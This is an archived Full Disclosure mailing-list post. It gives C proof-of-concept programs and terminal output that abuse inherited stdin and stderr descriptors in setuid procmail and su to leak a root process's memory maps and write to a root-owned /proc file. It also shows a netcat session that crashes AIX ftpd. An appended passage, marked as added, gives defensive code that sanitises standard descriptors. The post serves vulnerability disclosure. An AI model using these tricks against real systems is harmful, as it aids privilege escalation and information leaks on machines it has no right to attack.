Full Disclosure mailing list archives

Super Tiny Linux and AIX bugs
From: king cope <isowarez.isowarez.isowarez () googlemail com>
Date: Sun, 11 Aug 2013 23:23:21 +0700

Super Tiny Linux and AIX bugs

discovered and exploited by Kctherootkey somewhere between 9.8.2013-11.8.2013

allowed readers are h4x0rz listening to an arbitrary 2pac song,
all others please move along:>

uhh, hit em with a little tiny Linux bug.. my tiny Linux bug..

kcope () planetmars:~$ uname -a;cat /etc/debian_version
Linux monokelhost 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
7.1
kcope () planetmars:~$ cat test99.c
#include <fcntl.h>
#include <unistd.h>

int main(void) {
        /* close stdin, then open a file so it lands on fd 0 */
        close(0);
        open("/proc/self/maps", O_RDONLY);
        /* the setuid procmail now reads "the mail" from fd 0, i.e. its own maps */
        execl("/usr/bin/procmail", "procmail", "-d", "kcope", (char *)NULL);
        return 1;
}
kcope () planetmars:~$ gcc test99.c -o test99
kcope () planetmars:~$ >/var/mail/kcope
kcope () planetmars:~$ ./test99
kcope () planetmars:~$ cat /var/mail/kcope
08048000-0805c000 r-xp 00000000 08:01 144347     /usr/bin/procmail
0805c000-0805d000 r--p 00013000 08:01 144347     /usr/bin/procmail
0805d000-0805e000 rw-p 00014000 08:01 144347     /usr/bin/procmail
08c49000-08c6a000 rw-p 00000000 00:00 0          [heap]
b75a8000-b75b2000 r-xp 00000000 08:01 4908       /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b2000-b75b3000 r--p 00009000 08:01 4908       /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b3000-b75b4000 rw-p 0000a000 08:01 4908       /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b4000-b75bd000 r-xp 00000000 08:01 4920       /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bd000-b75be000 r--p 00008000 08:01 4920       /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75be000-b75bf000 rw-p 00009000 08:01 4920       /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bf000-b75d2000 r-xp 00000000 08:01 4918       /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d2000-b75d3000 r--p 00012000 08:01 4918       /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d3000-b75d4000 rw-p 00013000 08:01 4918       /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d4000-b75d6000 rw-p 00000000 00:00 0
b75d6000-b75dc000 r-xp 00000000 08:01 4910       /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dc000-b75dd000 r--p 00005000 08:01 4910       /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dd000-b75de000 rw-p 00006000 08:01 4910       /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75de000-b75e0000 rw-p 00000000 00:00 0
b75e0000-b773c000 r-xp 00000000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773c000-b773d000 ---p 0015c000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773d000-b773f000 r--p 0015c000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773f000-b7740000 rw-p 0015e000 08:01 4914       /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7740000-b7743000 rw-p 00000000 00:00 0
b7743000-b7767000 r-xp 00000000 08:01 4911       /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7767000-b7768000 r--p 00023000 08:01 4911       /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7768000-b7769000 rw-p 00024000 08:01 4911       /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b776e000-b7770000 rw-p 00000000 00:00 0
b7770000-b7771000 r-xp 00000000 00:00 0          [vdso]
b7771000-b778d000 r-xp 00000000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778d000-b778e000 r--p 0001b000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
b778e000-b778f000 rw-p 0001c000 08:01 58         /lib/i386-linux-gnu/ld-2.13.so
bfd62000-bfd83000 rw-p 00000000 00:00 0          [stack]

geez! leaks process maps of setuid root executable. should investigate deeper..

kcope () planetmars:~$ cat test99.c
#include <fcntl.h>
#include <unistd.h>

int main(void) {
        /* close stderr, then open a file so it lands on fd 2 */
        close(2);
        open("/proc/self/comm", O_RDWR);
        /* the setuid su now writes its prompt to fd 2, i.e. its own comm file */
        execl("/bin/su", "su", (char *)NULL);
        return 1;
}
kcope () planetmars:~$ ./test99

kcope () planetmars:~$ ps aux|grep su
root        12  0.0  0.0      0     0 ?        S    14:19   0:00 [sync_supers]
root      6543  0.0  0.4   4240  1128 pts/0    S+   17:58   0:00 su
kcope     6545  0.0  0.3   3568   820 pts/1    S+   17:58   0:00 grep su
You got mail in /var/mail/kcope !!

kcope () planetmars:~$ ls -la /proc/6543/comm
-rw-r--r-- 1 root root 0 Aug 11 17:58 /proc/6543/comm
kcope () planetmars:~$ cat /proc/6543/comm
Password:

it's writing supplied input to root owned files!
can somebody, hello lists, give me pointers about how to exploit this, if
possible. I know this might be an issue for vuln-dev but I'm a rude boy!

another tiny bug in aix ftpd

kcope () planetmars:~$ nc <ip> 21
220 aix1 FTP server (Version 4.2 Wed Dec 23 11:06:15 CST 2009) ready.
user ftp
331 Guest login ok, send ident as password.
pass ftp
230-Last unsuccessful login: Sat Aug 10 19:23:18 EDT 2013 on ssh from planetmars
230-Last login: Sun Aug 11 11:03:41 EDT 2013 on ftp from planetmars
230 Guest login ok, access restrictions apply.
user root
421 ftpd: get_auth_methods() failed: Bad file number
421 root cannot authenticate to server

connection closes and ftpd might coredump..

can somebody please truss the process and tell me what file it wants to open?
this might be exploitable. thanks a lot!

/Kctherootkey
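The common thread in both Linux PoCs above is that a setuid program trusts whatever the unprivileged caller left on descriptors 0, 1 and 2. The following is an added example, not code from the post, of the standard defensive measure (the same idea as OpenSSH's sanitise_stdfd()): a setuid program, before doing anything else, re-opens any closed standard descriptor onto /dev/null so that a later open() cannot land on fd 0/1/2 and become its stdin or stderr. The function names are the example's own.

```c
/* Added example: re-open closed standard descriptors in a setuid program.
 * Not from the original post; fd_is_open/ensure_fd_open/sanitize_std_fds
 * are names chosen for this example. */
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if fd refers to an open file description, 0 if it is closed. */
int fd_is_open(int fd)
{
    return fcntl(fd, F_GETFD) != -1;
}

/* Make sure fd is open. If it is closed, install /dev/null on it.
 * Returns 0 if nothing was needed, 1 if /dev/null was installed, -1 on error. */
int ensure_fd_open(int fd)
{
    if (fd_is_open(fd))
        return 0;
    /* open() hands out the lowest free descriptor, so when fds are fixed in
     * order 0,1,2 this usually *is* fd; dup2 covers the case where it is not. */
    int nul = open("/dev/null", fd == STDIN_FILENO ? O_RDONLY : O_WRONLY);
    if (nul == -1)
        return -1;
    if (nul != fd) {
        int rc = dup2(nul, fd);
        close(nul);
        if (rc == -1)
            return -1;
    }
    return 1;
}

/* Call first in main() of a privileged program. Returns how many of the
 * three standard descriptors had to be repaired, or -1 on failure. */
int sanitize_std_fds(void)
{
    int repaired = 0;
    for (int fd = 0; fd <= 2; fd++) {
        int r = ensure_fd_open(fd);
        if (r < 0)
            return -1;
        repaired += r;
    }
    return repaired;
}

/* 1 if fd is a character device (what /dev/null is), else 0. */
int fd_is_chardev(int fd)
{
    struct stat st;
    return fstat(fd, &st) == 0 && S_ISCHR(st.st_mode);
}
```

This covers the su case (a closed fd 2 being refilled by the program's own open()); it does nothing for the procmail case, where fd 0 is already open on a file the caller chose, so input read from inherited descriptors still has to be treated as untrusted.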

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
